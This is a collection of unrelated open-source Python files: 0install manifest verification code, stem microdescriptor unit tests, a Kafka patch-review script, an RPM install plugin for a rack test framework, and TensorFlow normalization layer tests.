return (get_algorithm(alg), digest)
def copy_with_verify(src, dest, mode, alg, required_digest):
"""Copy path src to dest, checking that the contents give the right digest.
dest must not exist. New file is created with a mode of 'mode & umask'.
@param src: source filename
@type src: str
@param dest: target filename
@type dest: str
@param mode: target mode
@type mode: int
@param alg: algorithm to generate digest
@type alg: L{Algorithm}
@param required_digest: expected digest value
@type required_digest: str
@raise BadDigest: the contents of the file don't match required_digest"""
with open(src, 'rb') as src_obj:
dest_fd = os.open(dest, os.O_WRONLY | os.O_CREAT | os.O_EXCL, mode)
try:
digest = alg.new_digest()
while True:
data = src_obj.read(256)
if not data: break
digest.update(data)
while data:
written = os.write(dest_fd, data)
assert written >= 0
data = data[written:]
finally:
os.close(dest_fd)
actual = digest.hexdigest()
if actual == required_digest: return
os.unlink(dest)
raise BadDigest(_("Copy failed: file '%(src)s' has wrong digest (may have been tampered with)\n"
"Expected: %(required_digest)s\n"
"Actual: %(actual_digest)s") % {'src': src, 'required_digest': required_digest, 'actual_digest': actual})
def verify(root, required_digest = None):
"""Ensure that directory 'dir' generates the given digest.
For a non-error return:
- Dir's name must be a digest (in the form "alg=value")
- The calculated digest of the contents must match this name.
- If there is a .manifest file, then its digest must also match.
@raise BadDigest: if verification fails."""
if required_digest is None:
required_digest = os.path.basename(root)
alg = splitID(required_digest)[0]
digest = alg.new_digest()
lines = []
for line in alg.generate_manifest(root):
line += '\n'
digest.update(line.encode('utf-8'))
lines.append(line)
actual_digest = alg.getID(digest)
manifest_file = os.path.join(root, '.manifest')
if os.path.isfile(manifest_file):
digest = alg.new_digest()
with open(manifest_file, 'rb') as stream:
digest.update(stream.read())
manifest_digest = alg.getID(digest)
else:
manifest_digest = None
if required_digest == actual_digest == manifest_digest:
return
error = BadDigest(_("Cached item does NOT verify."))
error.detail = _(" Expected: %(required_digest)s\n"
" Actual: %(actual_digest)s\n"
".manifest digest: %(manifest_digest)s\n\n") \
% {'required_digest': required_digest, 'actual_digest': actual_digest, 'manifest_digest': manifest_digest or _('No .manifest file')}
if manifest_digest is None:
error.detail += _("No .manifest, so no further details available.")
elif manifest_digest == actual_digest:
error.detail += _("The .manifest file matches the actual contents. Very strange!")
elif manifest_digest == required_digest:
import difflib
with open(manifest_file, 'rt') as stream:
diff = difflib.unified_diff(stream.readlines(), lines,
'Recorded', 'Actual')
error.detail += _("The .manifest file matches the directory name.\n" \
"The contents of the directory have changed:\n") + \
''.join(diff)
elif required_digest == actual_digest:
error.detail += _("The directory contents are correct, but the .manifest file is wrong!")
else:
error.detail += _("The .manifest file matches neither of the other digests. Odd.")
raise error
# XXX: Be more careful about the source tree changing under us. In particular, what happens if:
# - A regualar file suddenly turns into a symlink?
# - We find a device file (users can hard-link them if on the same device)
def copy_tree_with_verify(source, target, manifest_data, required_digest):
"""Copy directory source to be a subdirectory of target if it matches the required_digest.
manifest_data is normally source/.manifest. source and manifest_data are not trusted
(will typically be under the control of another user).
The copy is first done to a temporary directory in target, then renamed to the final name
only if correct. Therefore, an invalid 'target/required_digest' will never exist.
A successful return means than target/required_digest now exists (whether we created it or not)."""
import tempfile
alg, digest_value = splitID(required_digest)
if isinstance(alg, OldSHA1):
raise SafeException(_("Sorry, the 'sha1' algorithm does not support copying."))
digest = alg.new_digest()
digest.update(manifest_data)
manifest_digest = alg.getID(digest)
if manifest_digest != required_digest:
raise BadDigest(_("Manifest has been tampered with!\n"
"Manifest digest: %(actual_digest)s\n"
"Directory name : %(required_digest)s")
% {'actual_digest': manifest_digest, 'required_digest': required_digest})
target_impl = os.path.join(target, required_digest)
if os.path.isdir(target_impl):
logger.info(_("Target directory '%s' already exists"), target_impl)
return
# We've checked that the source's manifest matches required_digest, so it
# is what we want. Make a list of all the files we need to copy...
wanted = _parse_manifest(manifest_data.decode('utf-8'))
tmpdir = tempfile.mkdtemp(prefix = 'tmp-copy-', dir = target)
try:
_copy_files(alg, wanted, source, tmpdir)
if wanted:
raise SafeException(_('Copy failed; files missing from source:') + '\n- ' +
'\n- '.join(wanted.keys()))
# Make directories read-only (files are already RO)
for root, dirs, files in os.walk(tmpdir):
for d in dirs:
path = os.path.join(root, d)
mode = os.stat(path).st_mode
os.chmod(path, mode & 0o555)
# Check that the copy is correct
actual_digest = alg.getID(add_manifest_file(tmpdir, alg))
if actual_digest != required_digest:
raise SafeException(_("Copy failed; double-check of target gave the wrong digest.\n"
"Unless the target was modified during the copy, this is a BUG\n"
"in 0store and should be reported.\n"
"Expected: %(required_digest)s\n"
"Actual: %(actual_digest)s") % {'required_digest': required_digest, 'actual_digest': actual_digest})
try:
os.chmod(tmpdir, 0o755) # need write permission to rename on MacOS X
os.rename(tmpdir, target_impl)
os.chmod(target_impl, 0o555)
tmpdir = None
except OSError:
if not os.path.isdir(target_impl):
raise
# else someone else installed it already - return success
finally:
if tmpdir is not None:
logger.info(_("Deleting tmpdir '%s'") % tmpdir)
from zeroinstall.support import ro_rmtree
ro_rmtree(tmpdir)
def _parse_manifest(manifest_data):
"""Parse a manifest file.
@param manifest_data: the contents of the manifest file
@type manifest_data: str
@return: a mapping from paths to information about that path
@rtype: {str: tuple}"""
wanted = {}
dir = ''
for line in manifest_data.split('\n'):
if not line: break
if line[0] == 'D':
data = line.split(' ', 1)
if len(data) != 2: raise BadDigest(_("Bad line '%s'") % line)
path = data[-1]
if not path.startswith('/'): raise BadDigest(_("Not absolute: '%s'") % line)
path = path[1:]
dir = path
elif line[0] == 'S':
data = line.split(' ', 3)
path = os.path.join(dir, data[-1])
if len(data) != 4: raise BadDigest(_("Bad line '%s'") % line)
else:
data = line.split(' ', 4)
path = os.path.join(dir, data[-1])
if len(data) != 5: raise BadDigest(_("Bad line '%s'") % line)
if path in wanted:
raise BadDigest(_('Duplicate entry "%s"') % line)
wanted[path] = data[:-1]
return wanted
def _copy_files(alg, wanted, source, target):
"""Scan for files under 'source'. For each one:
If it is in wanted and has the right details (or they can be fixed; e.g. mtime),
then copy it into 'target'.
If it's not in wanted, warn and skip it.
On exit, wanted contains only files that were not found."""
dir = ''
for line in alg.generate_manifest(source):
if line[0] == 'D':
type, name = line.split(' ', 1)
assert name.startswith('/')
dir = name[1:]
path = dir
elif line[0] == 'S':
type, actual_digest, actual_size, name = line.split(' ', 3)
path = os.path.join(dir, name)
else:
assert line[0] in 'XF'
type, actual_digest, actual_mtime, actual_size, name = line.split(' ', 4)
path = os.path.join(dir, name)
try:
required_details = wanted.pop(path)
except KeyError:
logger.warn(_("Skipping file not in manifest: '%s'"), path)
continue
if required_details[0] != type:
raise BadDigest(_("Item '%s' has wrong type!") % path)
if type == 'D':
os.mkdir(os.path.join(target, path))
elif type in 'XF':
required_type, required_digest, required_mtime, required_size = required_details
if required_size != actual_size:
raise SafeException(_("File '%(path)s' has wrong size (%(actual_size)s bytes, but should be "
"%(required_size)s according to manifest)") %
{'path': path, 'actual_size': actual_size, 'required_size': required_size})
required_mtime = int(required_mtime)
dest_path = os.path.join(target, path)
if type == 'X':
mode = 0o555
else:
mode = 0o444
copy_with_verify(os.path.join(source, path),
dest_path,
mode,
alg,
required_digest)
os.utime(dest_path, (required_mtime, required_mtime))
elif type == 'S':
required_type, required_digest, required_size = required_details
if required_size != actual_size:
raise SafeException(_("Symlink '%(path)s' has wrong size (%(actual_size)s bytes, but should be "
"%(required_size)s according to manifest)") %
{'path': path, 'actual_size': actual_size, 'required_size': required_size})
symlink_target = os.readlink(os.path.join(source, path))
symlink_digest = alg.new_digest()
symlink_digest.update(symlink_target.encode('utf-8'))
if symlink_digest.hexdigest() != required_digest:
raise SafeException(_("Symlink '%(path)s' has wrong target (digest should be "
"%(digest)s according to manifest)") % {'path': path, 'digest': required_digest})
dest_path = os.path.join(target, path)
os.symlink(symlink_target, dest_path)
else:
raise SafeException(_("Unknown manifest type %(type)s for '%(path)s'") % {'type': type, 'path': path})
class HashLibAlgorithm(Algorithm):
new_digest = None # Constructor for digest objects
def __init__(self, name, rating, hash_name = None):
self.name = name
self.new_digest = getattr(hashlib, hash_name or name)
self.rating = rating
def generate_manifest(self, root):
def recurse(sub):
# To ensure that a line-by-line comparison of the manifests
# is possible, we require that filenames don't contain newlines.
# Otherwise, you can name a file so that the part after the \n
# would be interpreted as another line in the manifest.
if '\n' in sub: raise BadDigest(_("Newline in filename '%s'") % sub)
assert sub.startswith('/')
full = os.path.join(root, sub[1:])
info = os.lstat(full)
new_digest = self.new_digest
m = info.st_mode
if not stat.S_ISDIR(m): raise Exception(_('Not a directory: "%s"') % full)
if sub != '/':
yield "D %s" % sub
items = os.listdir(full)
items.sort()
dirs = []
for leaf in items:
path = os.path.join(root, sub[1:], leaf)
info = os.lstat(path)
m = info.st_mode
if stat.S_ISREG(m):
if leaf == '.manifest': continue
with open(path, 'rb') as stream:
d = new_digest(stream.read()).hexdigest()
if m & 0o111:
yield "X %s %s %s %s" % (d, int(info.st_mtime), info.st_size, leaf)
else:
yield "F %s %s %s %s" % (d, int(info.st_mtime), info.st_size, leaf)
elif stat.S_ISLNK(m):
target = os.readlink(path).encode('utf-8')
d = new_digest(target).hexdigest()
# Note: Can't use utime on symlinks, so skip mtime
# Note: eCryptfs may report length as zero, so count ourselves instead
yield "S %s %s %s" % (d, len(target), leaf)
elif stat.S_ISDIR(m):
dirs.append(leaf)
else:
raise SafeException(_("Unknown object '%s' (not a file, directory or symlink)") %
path)
if not sub.endswith('/'):
sub += '/'
for x in dirs:
# Note: "sub" is always Unix style. Don't use os.path.join here.
for y in recurse(sub + x): yield y
return
for x in recurse('/'): yield x
def getID(self, digest):
if self.name in ('sha1new', 'sha256'):
digest_str = digest.hexdigest()
else:
# Base32-encode newer algorithms to make the digest shorter.
# We can't use base64 as Windows is case insensitive.
# There's no need for padding (and = characters in paths cause problems for some software).
digest_str = base64.b32encode(digest.digest()).rstrip(b'=').decode('ascii')
return format_algorithm_digest_pair(self.name, digest_str)
algorithms = {
'sha1': OldSHA1(),
'sha1new': HashLibAlgorithm('sha1new', 50, 'sha1'),
'sha256': HashLibAlgorithm('sha256', 80),
'sha256new': HashLibAlgorithm('sha256new', 90, 'sha256'),
}
def fixup_permissions(root):
"""Set permissions recursively for children of root:
- If any X bit is set, they all must be.
- World readable, non-writable.
@raise Exception: if there are unsafe special bits set (setuid, etc)."""
for main, dirs, files in os.walk(root):
for x in ['.'] + files:
full = os.path.join(main, x)
raw_mode = os.lstat(full).st_mode
if stat.S_ISLNK(raw_mode): continue
mode = stat.S_IMODE(raw_mode)
if mode & ~0o777:
raise Exception(_("Unsafe mode: extracted file '%(filename)s' had special bits set in mode '%(mode)s'") % {'filename': full, 'mode': oct(mode)})
if mode & 0o111:
os.chmod(full, 0o555)
else:
os.chmod(full, 0o444)
|
timdiels/0install
|
zeroinstall/zerostore/manifest.py
|
Python
|
lgpl-2.1
| 19,123
|
"""
Unit tests for stem.descriptor.microdescriptor.
"""
import unittest
import stem.exit_policy
import stem.descriptor
from stem import str_type
from stem.descriptor.microdescriptor import Microdescriptor
from test.mocking import (
get_microdescriptor,
CRYPTO_BLOB,
)
from test.unit.descriptor import get_resource
FIRST_ONION_KEY = """\
-----BEGIN RSA PUBLIC KEY-----
MIGJAoGBAMhPQtZPaxP3ukybV5LfofKQr20/ljpRk0e9IlGWWMSTkfVvBcHsa6IM
H2KE6s4uuPHp7FqhakXAzJbODobnPHY8l1E4efyrqMQZXEQk2IMhgSNtG6YqUrVF
CxdSKSSy0mmcBe2TOyQsahlGZ9Pudxfnrey7KcfqnArEOqNH09RpAgMBAAE=
-----END RSA PUBLIC KEY-----\
"""
SECOND_ONION_KEY = """\
-----BEGIN RSA PUBLIC KEY-----
MIGJAoGBALCOxZdpMI2WO496njSQ2M7b4IgAGATqpJmH3So7lXOa25sK6o7JipgP
qQE83K/t/xsMIpxQ/hHkft3G78HkeXXFc9lVUzH0HmHwYEu0M+PMVULSkG36MfEl
7WeSZzaG+Tlnh9OySAzVyTsv1ZJsTQFHH9V8wuM0GOMo9X8DFC+NAgMBAAE=
-----END RSA PUBLIC KEY-----\
"""
THIRD_ONION_KEY = """\
-----BEGIN RSA PUBLIC KEY-----
MIGJAoGBAOWFQHxO+5kGuhwPUX5jB7wJCrTbSU0fZwolNV1t9UaDdjGDvIjIhdit
y2sMbyd9K8lbQO7x9rQjNst5ZicuaSOs854XQddSjm++vMdjYbOcVMqnKGSztvpd
w/1LVWFfhcBnsGi4JMGbmP+KUZG9A8kI9deSyJhfi35jA7UepiHHAgMBAAE=
-----END RSA PUBLIC KEY-----\
"""
class TestMicrodescriptor(unittest.TestCase):
def test_local_microdescriptors(self):
"""
Checks a small microdescriptor file with known contents.
"""
descriptor_path = get_resource('cached-microdescs')
with open(descriptor_path, 'rb') as descriptor_file:
descriptors = stem.descriptor.parse_file(descriptor_file, 'microdescriptor 1.0')
router = next(descriptors)
self.assertEqual(FIRST_ONION_KEY, router.onion_key)
self.assertEqual(None, router.ntor_onion_key)
self.assertEqual([], router.or_addresses)
self.assertEqual([], router.family)
self.assertEqual(stem.exit_policy.MicroExitPolicy('reject 1-65535'), router.exit_policy)
self.assertEqual({b'@last-listed': b'2013-02-24 00:18:36'}, router.get_annotations())
self.assertEqual([b'@last-listed 2013-02-24 00:18:36'], router.get_annotation_lines())
router = next(descriptors)
self.assertEqual(SECOND_ONION_KEY, router.onion_key)
self.assertEqual(str_type('r5572HzD+PMPBbXlZwBhsm6YEbxnYgis8vhZ1jmdI2k='), router.ntor_onion_key)
self.assertEqual([], router.or_addresses)
self.assertEqual(['$6141629FA0D15A6AEAEF3A1BEB76E64C767B3174'], router.family)
self.assertEqual(stem.exit_policy.MicroExitPolicy('reject 1-65535'), router.exit_policy)
self.assertEqual({b'@last-listed': b'2013-02-24 00:18:37'}, router.get_annotations())
self.assertEqual([b'@last-listed 2013-02-24 00:18:37'], router.get_annotation_lines())
router = next(descriptors)
self.assertEqual(THIRD_ONION_KEY, router.onion_key)
self.assertEqual(None, router.ntor_onion_key)
self.assertEqual([(str_type('2001:6b0:7:125::242'), 9001, True)], router.or_addresses)
self.assertEqual([], router.family)
self.assertEqual(stem.exit_policy.MicroExitPolicy('accept 80,443'), router.exit_policy)
self.assertEqual({b'@last-listed': b'2013-02-24 00:18:36'}, router.get_annotations())
self.assertEqual([b'@last-listed 2013-02-24 00:18:36'], router.get_annotation_lines())
def test_minimal_microdescriptor(self):
"""
Basic sanity check that we can parse a microdescriptor with minimal
attributes.
"""
desc = get_microdescriptor()
self.assertTrue(CRYPTO_BLOB in desc.onion_key)
self.assertEqual(None, desc.ntor_onion_key)
self.assertEqual([], desc.or_addresses)
self.assertEqual([], desc.family)
self.assertEqual(stem.exit_policy.MicroExitPolicy('reject 1-65535'), desc.exit_policy)
self.assertEqual(None, desc.exit_policy_v6)
self.assertEqual(None, desc.identifier_type)
self.assertEqual(None, desc.identifier)
self.assertEqual([], desc.get_unrecognized_lines())
def test_unrecognized_line(self):
"""
Includes unrecognized content in the descriptor.
"""
desc = get_microdescriptor({'pepperjack': 'is oh so tasty!'})
self.assertEqual(['pepperjack is oh so tasty!'], desc.get_unrecognized_lines())
def test_proceeding_line(self):
"""
Includes a line prior to the 'onion-key' entry.
"""
desc_text = b'family Amunet1\n' + get_microdescriptor(content = True)
self.assertRaises(ValueError, Microdescriptor, desc_text)
desc = Microdescriptor(desc_text, validate = False)
self.assertEqual(['Amunet1'], desc.family)
def test_a_line(self):
"""
Sanity test with both an IPv4 and IPv6 address.
"""
desc_text = get_microdescriptor(content = True)
desc_text += b'\na 10.45.227.253:9001'
desc_text += b'\na [fd9f:2e19:3bcf::02:9970]:9001'
expected = [
('10.45.227.253', 9001, False),
('fd9f:2e19:3bcf::02:9970', 9001, True),
]
desc = Microdescriptor(desc_text)
self.assertEqual(expected, desc.or_addresses)
def test_family(self):
"""
Check the family line.
"""
desc = get_microdescriptor({'family': 'Amunet1 Amunet2 Amunet3'})
self.assertEqual(['Amunet1', 'Amunet2', 'Amunet3'], desc.family)
# try multiple family lines
desc_text = get_microdescriptor(content = True)
desc_text += b'\nfamily Amunet1'
desc_text += b'\nfamily Amunet2'
self.assertRaises(ValueError, Microdescriptor, desc_text)
# family entries will overwrite each other
desc = Microdescriptor(desc_text, validate = False)
self.assertEqual(1, len(desc.family))
def test_exit_policy(self):
"""
Basic check for 'p' lines. The router status entries contain an identical
field so we're not investing much effort here.
"""
desc = get_microdescriptor({'p': 'accept 80,110,143,443'})
self.assertEqual(stem.exit_policy.MicroExitPolicy('accept 80,110,143,443'), desc.exit_policy)
def test_identifier(self):
"""
Basic check for 'id' lines.
"""
desc = get_microdescriptor({'id': 'rsa1024 Cd47okjCHD83YGzThGBDptXs9Z4'})
self.assertEqual('rsa1024', desc.identifier_type)
self.assertEqual('Cd47okjCHD83YGzThGBDptXs9Z4', desc.identifier)
|
lokeshh/stem
|
test/unit/descriptor/microdescriptor.py
|
Python
|
lgpl-3.0
| 6,106
|
#!/usr/bin/env python
import argparse
import sys
import os
import time
import datetime
import tempfile
import commands
import getpass
from jira.client import JIRA
def get_jira_config():
# read the config file
home=jira_home=os.getenv('HOME')
home=home.rstrip('/')
if not (os.path.isfile(home + '/jira.ini')):
jira_user=raw_input('JIRA user :')
jira_pass=getpass.getpass('JIRA password :')
jira_config = {'user':jira_user, 'password':jira_pass}
return jira_config
else:
jira_config = dict(line.strip().split('=') for line in open(home + '/jira.ini'))
return jira_config
def get_jira(jira_config):
options = {
'server': 'https://issues.apache.org/jira'
}
jira = JIRA(options=options,basic_auth=(jira_config['user'], jira_config['password']))
# (Force) verify the auth was really done
jira_session=jira.session()
if (jira_session is None):
raise Exception("Failed to login to the JIRA instance")
return jira
def cmd_exists(cmd):
status, result = commands.getstatusoutput(cmd)
return status
def main():
''' main(), shut up, pylint '''
popt = argparse.ArgumentParser(description='Kafka patch review tool')
popt.add_argument('-b', '--branch', action='store', dest='branch', required=True, help='Tracking branch to create diff against')
popt.add_argument('-j', '--jira', action='store', dest='jira', required=True, help='JIRA corresponding to the reviewboard')
popt.add_argument('-s', '--summary', action='store', dest='summary', required=False, help='Summary for the reviewboard')
popt.add_argument('-d', '--description', action='store', dest='description', required=False, help='Description for reviewboard')
popt.add_argument('-r', '--rb', action='store', dest='reviewboard', required=False, help='Review board that needs to be updated')
popt.add_argument('-t', '--testing-done', action='store', dest='testing', required=False, help='Text for the Testing Done section of the reviewboard')
popt.add_argument('-db', '--debug', action='store_true', required=False, help='Enable debug mode')
opt = popt.parse_args()
post_review_tool = None
if (cmd_exists("post-review") == 0):
post_review_tool = "post-review"
elif (cmd_exists("rbt") == 0):
post_review_tool = "rbt post"
else:
print "please install RBTools"
sys.exit(1)
patch_file=tempfile.gettempdir() + "/" + opt.jira + ".patch"
if opt.reviewboard:
ts = time.time()
st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d_%H:%M:%S')
patch_file=tempfile.gettempdir() + "/" + opt.jira + '_' + st + '.patch'
# first check if rebase is needed
git_branch_hash="git rev-parse " + opt.branch
p_now=os.popen(git_branch_hash)
branch_now=p_now.read()
p_now.close()
git_common_ancestor="git merge-base " + opt.branch + " HEAD"
p_then=os.popen(git_common_ancestor)
branch_then=p_then.read()
p_then.close()
if branch_now != branch_then:
print 'ERROR: Your current working branch is from an older version of ' + opt.branch + '. Please rebase first by using git pull --rebase'
sys.exit(1)
git_configure_reviewboard="git config reviewboard.url https://reviews.apache.org"
print "Configuring reviewboard url to https://reviews.apache.org"
p=os.popen(git_configure_reviewboard)
p.close()
git_remote_update="git remote update"
print "Updating your remote branches to pull the latest changes"
p=os.popen(git_remote_update)
p.close()
# Get JIRA configuration and login to JIRA to ensure the credentials work, before publishing the patch to the review board
print "Verifying JIRA connection configurations"
try:
jira_config=get_jira_config()
jira=get_jira(jira_config)
except:
print "Failed to login to the JIRA instance", sys.exc_info()[0], sys.exc_info()[1]
sys.exit(1)
git_command="git format-patch " + opt.branch + " --stdout > " + patch_file
if opt.debug:
print git_command
p=os.popen(git_command)
p.close()
print 'Getting latest patch attached to the JIRA'
tmp_dir = tempfile.mkdtemp()
get_latest_patch_command="python ./dev-utils/test-patch.py --get-latest-patch --defect " + opt.jira + " --output " + tmp_dir + " > /dev/null 2>&1"
p=os.popen(get_latest_patch_command)
p.close()
previous_patch=tmp_dir + "/" + opt.jira + ".patch"
diff_file=tmp_dir + "/" + opt.jira + ".diff"
if os.path.isfile(previous_patch) and os.stat(previous_patch).st_size > 0:
print 'Creating diff with previous version of patch uploaded to JIRA'
diff_command = "diff " + previous_patch+ " " + patch_file + " > " + diff_file
try:
p=os.popen(diff_command)
sys.stdout.flush()
p.close()
except:
pass
print 'Diff with previous version of patch uploaded to JIRA is saved to ' + diff_file
print 'Checking if the there are changes that need to be pushed'
if os.stat(diff_file).st_size == 0:
print 'No changes found on top of changes uploaded to JIRA'
print 'Aborting'
sys.exit(1)
rb_command= post_review_tool + " --publish --tracking-branch " + opt.branch + " --target-groups=kafka --bugs-closed=" + opt.jira
if opt.debug:
rb_command=rb_command + " --debug"
summary="Patch for " + opt.jira
if opt.summary:
summary=opt.summary
rb_command=rb_command + " --summary \"" + summary + "\""
if opt.description:
rb_command=rb_command + " --description \"" + opt.description + "\""
if opt.reviewboard:
rb_command=rb_command + " -r " + opt.reviewboard
if opt.testing:
rb_command=rb_command + " --testing-done=" + opt.testing
if opt.debug:
print rb_command
p=os.popen(rb_command)
rb_url=""
for line in p:
print line
if line.startswith('http'):
rb_url = line
elif line.startswith("There don't seem to be any diffs"):
print 'ERROR: Your reviewboard was not created/updated since there was no diff to upload. The reasons that can cause this issue are 1) Your diff is not checked into your local branch. Please check in the diff to the local branch and retry 2) You are not specifying the local branch name as part of the --branch option. Please specify the remote branch name obtained from git branch -r'
p.close()
sys.exit(1)
elif line.startswith("Your review request still exists, but the diff is not attached") and not opt.debug:
print 'ERROR: Your reviewboard was not created/updated. Please run the script with the --debug option to troubleshoot the problem'
p.close()
sys.exit(1)
if p.close() != None:
print 'ERROR: reviewboard update failed. Exiting.'
sys.exit(1)
if opt.debug:
print 'rb url=',rb_url
print 'Creating diff against', opt.branch, 'and uploading patch to JIRA',opt.jira
issue = jira.issue(opt.jira)
attachment=open(patch_file)
jira.add_attachment(issue,attachment)
attachment.close()
comment="Created reviewboard "
if not opt.reviewboard:
print 'Created a new reviewboard',rb_url,
else:
print 'Updated reviewboard',rb_url
comment="Updated reviewboard "
comment = comment + rb_url + ' against branch ' + opt.branch
jira.add_comment(opt.jira, comment)
#update the JIRA status to PATCH AVAILABLE
transitions = jira.transitions(issue)
transitionsMap ={}
for t in transitions:
transitionsMap[t['name']] = t['id']
if('Submit Patch' in transitionsMap):
jira.transition_issue(issue, transitionsMap['Submit Patch'] , assignee={'name': jira_config['user']} )
if __name__ == '__main__':
sys.exit(main())
|
confluentinc/kafka-deprecated-fork
|
kafka-patch-review.py
|
Python
|
apache-2.0
| 7,486
|
from strato.racktest.hostundertest import plugins
import os
import time
import socket
class RPM:
def __init__(self, host):
self._host = host
def installRPMPackage(self, path):
basename = os.path.basename(path)
self._host.ssh.ftp.putFile(basename, path)
self._retryInstallPackageSinceAtBootTimeMightBeLocked(basename)
def yumInstall(self, packageList):
if isinstance(packageList, str):
packageList = [packageList]
self._host.ssh.run.script("yum install %s --assumeyes" % (" ".join(packageList)))
def makeYUMCachePointToTestRunner(self):
ip = self._myIPForHost()
self._host.ssh.run.script("sed -i 's/127.0.0.1/%s/' /etc/yum.conf" % ip)
def _retryInstallPackageSinceAtBootTimeMightBeLocked(self, basename):
RETRIES = 20
for i in xrange(RETRIES):
try:
self._host.ssh.run.script("rpm -i --force ./%s" % basename)
return
except Exception as e:
if i < RETRIES - 1 and 'yum status database is locked by another process' in str(e):
time.sleep(0.5)
continue
raise
def _myIPForHost(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect((self._host.node.ipAddress(), 1))
return s.getsockname()[0]
finally:
s.close()
plugins.register('rpm', RPM)
|
Stratoscale/pyracktest
|
py/strato/racktest/hostundertest/builtinplugins/rpm.py
|
Python
|
apache-2.0
| 1,467
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for keras.layers.preprocessing.normalization."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
import numpy as np
from tensorflow.python import keras
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.eager import context
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.keras.layers.preprocessing import normalization
from tensorflow.python.keras.layers.preprocessing import normalization_v1
from tensorflow.python.keras.layers.preprocessing import preprocessing_test_utils
from tensorflow.python.keras.utils.generic_utils import CustomObjectScope
from tensorflow.python.platform import test
def get_layer_class():
if context.executing_eagerly():
return normalization.Normalization
else:
return normalization_v1.Normalization
def _get_layer_computation_test_cases():
test_cases = ({
"adapt_data": np.array([[1.], [2.], [3.], [4.], [5.]], dtype=np.float32),
"axis": -1,
"test_data": np.array([[1.], [2.], [3.]], np.float32),
"expected": np.array([[-1.414214], [-.707107], [0]], np.float32),
"testcase_name": "2d_single_element"
}, {
"adapt_data": np.array([[1.], [2.], [3.], [4.], [5.]], dtype=np.float32),
"axis": None,
"test_data": np.array([[1.], [2.], [3.]], np.float32),
"expected": np.array([[-1.414214], [-.707107], [0]], np.float32),
"testcase_name": "2d_single_element_none_axis"
}, {
"adapt_data": np.array([[1., 2., 3., 4., 5.]], dtype=np.float32),
"axis": None,
"test_data": np.array([[1.], [2.], [3.]], np.float32),
"expected": np.array([[-1.414214], [-.707107], [0]], np.float32),
"testcase_name": "2d_single_element_none_axis_flat_data"
}, {
"adapt_data":
np.array([[[1., 2., 3.], [2., 3., 4.]], [[3., 4., 5.], [4., 5., 6.]]],
np.float32),
"axis":
1,
"test_data":
np.array([[[1., 2., 3.], [2., 3., 4.]], [[3., 4., 5.], [4., 5., 6.]]],
np.float32),
"expected":
np.array([[[-1.549193, -0.774597, 0.], [-1.549193, -0.774597, 0.]],
[[0., 0.774597, 1.549193], [0., 0.774597, 1.549193]]],
np.float32),
"testcase_name":
"3d_internal_axis"
}, {
"adapt_data":
np.array(
[[[1., 0., 3.], [2., 3., 4.]], [[3., -1., 5.], [4., 5., 8.]]],
np.float32),
"axis": (1, 2),
"test_data":
np.array(
[[[3., 1., -1.], [2., 5., 4.]], [[3., 0., 5.], [2., 5., 8.]]],
np.float32),
"expected":
np.array(
[[[1., 3., -5.], [-1., 1., -1.]], [[1., 1., 1.], [-1., 1., 1.]]],
np.float32),
"testcase_name":
"3d_multiple_axis"
})
crossed_test_cases = []
# Cross above test cases with use_dataset in (True, False)
for use_dataset in (True, False):
for case in test_cases:
case = case.copy()
if use_dataset:
case["testcase_name"] = case["testcase_name"] + "_with_dataset"
case["use_dataset"] = use_dataset
crossed_test_cases.append(case)
return crossed_test_cases
@keras_parameterized.run_all_keras_modes
class NormalizationTest(keras_parameterized.TestCase,
preprocessing_test_utils.PreprocessingLayerTest):
def test_layer_api_compatibility(self):
cls = get_layer_class()
with CustomObjectScope({"Normalization": cls}):
output_data = testing_utils.layer_test(
cls,
kwargs={"axis": -1},
input_shape=(None, 3),
input_data=np.array([[3, 1, 2], [6, 5, 4]], dtype=np.float32),
validate_training=False,
adapt_data=np.array([[1, 2, 1], [2, 3, 4], [1, 2, 1], [2, 3, 4]]))
expected = np.array([[3., -3., -0.33333333], [9., 5., 1.]])
self.assertAllClose(expected, output_data)
def test_combiner_api_compatibility(self):
data = np.array([[1], [2], [3], [4], [5]])
combiner = normalization._NormalizingCombiner(axis=-1)
expected = {
"count": np.array(5.0),
"variance": np.array([2.]),
"mean": np.array([3.])
}
expected_accumulator = combiner._create_accumulator(expected["count"],
expected["mean"],
expected["variance"])
self.validate_accumulator_serialize_and_deserialize(combiner, data,
expected_accumulator)
self.validate_accumulator_uniqueness(combiner, data)
self.validate_accumulator_extract(combiner, data, expected)
self.validate_accumulator_extract_and_restore(combiner, data,
expected)
@parameterized.named_parameters(
{
"data": np.array([[1], [2], [3], [4], [5]]),
"axis": -1,
"expected": {
"count": np.array(5.0),
"variance": np.array([2.]),
"mean": np.array([3.])
},
"testcase_name": "2d_single_element"
}, {
"data": np.array([[1, 2], [2, 3], [3, 4], [4, 5], [5, 6]]),
"axis": -1,
"expected": {
"count": np.array(5.0),
"mean": np.array([3., 4.]),
"variance": np.array([2., 2.])
},
"testcase_name": "2d_multi_element"
}, {
"data": np.array([[[1, 2]], [[2, 3]], [[3, 4]], [[4, 5]], [[5, 6]]]),
"axis": 2,
"expected": {
"count": np.array(5.0),
"mean": np.array([3., 4.]),
"variance": np.array([2., 2.])
},
"testcase_name": "3d_multi_element"
}, {
"data": np.array([[[1, 2]], [[2, 3]], [[3, 4]], [[4, 5]], [[5, 6]]]),
"axis": (1, 2),
"expected": {
"count": np.array(5.0),
"mean": np.array([[3., 4.]]),
"variance": np.array([[2., 2.]])
},
"testcase_name": "3d_multi_element_multi_axis"
}, {
"data":
np.array([[[1, 2], [2, 3]], [[3, 4], [4, 5]], [[1, 2], [2, 3]],
[[3, 4], [4, 5]]]),
"axis":
1,
"expected": {
"count": np.array(8.0),
"mean": np.array([2.5, 3.5]),
"variance": np.array([1.25, 1.25])
},
"testcase_name":
"3d_multi_element_internal_axis"
})
